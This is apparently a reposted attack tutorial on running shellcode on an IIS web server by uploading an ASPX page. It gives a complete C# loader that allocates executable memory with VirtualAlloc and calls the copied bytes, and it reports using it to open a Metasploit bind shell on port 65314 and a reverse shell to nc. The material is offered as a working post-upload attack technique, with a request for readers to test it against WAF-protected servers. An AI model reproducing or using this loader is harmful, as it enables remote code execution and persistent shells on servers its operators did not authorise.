Execute shellcode using ASPX

Source: Internet
Author: User

First of all, this method has some limitations and should only be used in special cases, such as when an exe file cannot be uploaded or cannot be executed. Environment requirements: the server supports aspx, and you can upload aspx files to the server and access them.

1. Basic Principles

Upload an aspx file to the server with the following content:

<%@ Page Language="C#" AutoEventWireup="true" Inherits="System.Web.UI.Page" %>
<%@ Import Namespace="System" %>

<script runat="server">
// Runs on every request; calls the "backend" method defined in this same file.
protected void Page_Load(object sender, EventArgs e)
{
    Response.Write(Hello());
}
private string Hello()
{
    return "Hello World";
}
</script>
.NET users who have built websites will know how this code works. Simply put, I have placed the backend (code-behind) code in the front-end part of the page. When the page is accessed, the Page_Load event fires and the Hello() member function is called. The backend code can be C# or VB. In a .NET website most of the source consists of xxx.aspx and xxx.aspx.cs (or xxx.aspx.vb) files; the .cs or .vb file is the corresponding code-behind. After the website is published, the code-behind is compiled into a dll file, so you cannot modify it. However, backend code can still be inserted into the front end. If both the front end and the code-behind define a Page_Load event, Microsoft has a default rule for the execution order of the two: the front-end code runs before the code-behind, so you don't have to worry about the code you write not being run.

In addition, if you place xxx.aspx together with its xxx.aspx.cs directly in the website directory, the code in the .cs file is also executed normally. You may have come across this situation; in that case you can put the code directly in the .cs file, and the result is the same.

When accessed, the page above outputs Hello World (screenshot omitted).
Since backend code can be written in the front-end page and executed there, anything that .NET supports and the account's permissions allow can be written in C# or VB and executed this way.

2. Exploitation Methods

With this you can do a lot, such as executing a command or starting a program. This is why aspx webshells seem to have higher privileges than asp ones. So using it to execute shellcode is not difficult.

<%@ Page Language="C#" AutoEventWireup="true" Inherits="System.Web.UI.Page" %>
<%@ Import Namespace="System" %>
<%@ Import Namespace="System.Runtime.InteropServices" %>

<script runat="server">
// Delegate type used to call the copied bytes as if they were a function.
delegate int MsfpayloadProc();
protected void Page_Load(object sender, EventArgs e)
{
    byte[] codeBytes = { /* Your shellcode */ };
    IntPtr handle = IntPtr.Zero;
    // Reserve and commit a readable, writable and executable region.
    handle = VirtualAlloc(
        IntPtr.Zero,
        codeBytes.Length,
        MEM_COMMIT | MEM_RESERVE,
        PAGE_EXECUTE_READWRITE);
    try
    {
        // Copy the bytes into the region and call them through the delegate.
        Marshal.Copy(codeBytes, 0, handle, codeBytes.Length);
        MsfpayloadProc msfpayload
            = Marshal.GetDelegateForFunctionPointer(handle, typeof(MsfpayloadProc)) as MsfpayloadProc;
        msfpayload();
    }
    finally
    {
        VirtualFree(handle, 0, MEM_RELEASE);
    }
}

// Windows API
[DllImport("Kernel32.dll", EntryPoint = "VirtualAlloc")]
public static extern IntPtr VirtualAlloc(IntPtr address, int size, uint allocType, uint protect);
[DllImport("Kernel32.dll", EntryPoint = "VirtualFree")]
public static extern bool VirtualFree(IntPtr address, int size, uint freeType);
// Flags
const uint MEM_COMMIT = 0x1000;
const uint MEM_RESERVE = 0x2000;
const uint PAGE_EXECUTE_READWRITE = 0x40;
const uint MEM_RELEASE = 0x8000;
</script>
Upload the prepared aspx file and access it. The page stays in a loading state. The shellcode I added to the test page is an msfpayload bind_tcp payload listening on port 65314 (chosen by hand; any resemblance is coincidental). Check whether the port is listening (screenshot omitted):
Now look at the process (screenshot omitted):
Test whether the listener can be connected to (screenshot omitted):

You can see that the connection succeeds, but the privilege is still Network Service. At this point, even if you close the shellcode.aspx page, msfpayload keeps running and the connection is not interrupted. Of course, if you restart the website's application pool, msfpayload stops running.

3. Summary

If you can escalate privileges and directly upload and run an exe file, you can skip this post and ignore all of the above. Also, shellcode run this way has the same permissions as the IIS worker process. If the shellcode performs an operation that account is not permitted to do, such as adding an administrator, the connection is reset when you access the page. So do not count on it for privilege escalation; if that were possible, someone would have thought of it long ago.

So what is such a method good for? That is for you to work out. I don't know much about shellcode.

I tested on win2k3 + IIS 6. You are welcome to test in other environments, including ones with a WAF installed, and give feedback.

Later I tried shellcode that spawns a reverse shell back to nc, and it also succeeded. The shellcode is in this format: 0xfc, 0xe8, 0x89, 0x00.
